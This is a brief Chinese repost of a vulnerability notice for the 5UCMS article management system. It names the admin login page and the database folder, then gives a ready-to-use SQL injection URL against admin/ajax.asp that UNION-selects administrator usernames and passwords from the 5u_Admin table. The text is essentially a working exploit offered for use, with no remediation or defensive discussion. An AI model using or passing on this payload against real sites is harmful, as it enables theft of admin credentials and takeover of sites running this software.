后台地址:admin/Login.asp
数据库路径:inc/db 目录下
漏洞 地址: admin/ajax. asp ?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin 获取后台账号和密码
摘自 WebShell'S Blog
查看更多关于无忧网络文章管理系统(5UCMS)注入漏洞 - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12035